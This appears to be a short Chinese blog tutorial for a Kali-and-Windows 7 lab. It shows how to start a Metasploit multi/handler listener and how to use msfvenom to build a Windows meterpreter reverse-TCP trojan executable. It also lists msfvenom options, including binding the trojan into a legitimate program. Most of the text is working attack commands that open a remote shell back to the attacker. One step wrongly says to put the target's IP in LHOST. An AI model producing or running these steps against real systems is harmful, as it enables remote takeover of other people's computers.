实验环境

KaLi 与win7 ‘
kali ip =192.168.0.109
win7 ip =192.168.85.130

漏洞利用

1.启动Metasploit
msfconsole

2.漏洞

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
Show options
将目标IP填进去
set LHOST ip
set LPORT 端口(有默认可改)

Kali Metasploit 漏洞利用(1)

生成木马

payload
msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip(攻击者) LPORT=端 -f exe >text.exe
Kali Metasploit 漏洞利用(1)
木马制造:msfpayload kali 于2015年合并于msfvenom
工具:msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip(攻击者) LPORT=端 -f exe >text.exe
msfvenom参数:
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助

相关文章: